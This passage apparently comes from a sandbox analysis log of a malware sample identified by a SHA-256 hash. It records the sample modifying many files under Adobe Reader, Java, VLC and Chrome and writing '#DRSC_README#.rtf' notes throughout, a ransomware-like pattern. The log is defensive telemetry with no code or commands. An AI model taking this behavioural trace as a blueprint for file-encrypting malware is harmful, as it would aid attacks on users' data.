Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_zh_tw_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\s_agreement_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_it_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\stopNetworkServer 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\setup.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\plugin.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\tr_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\AddressBook2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fi_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\Welcome.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluDCFilesEmpty_180x180.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\kn.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\java-rmi.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_audit_report_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluError_136x136.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created 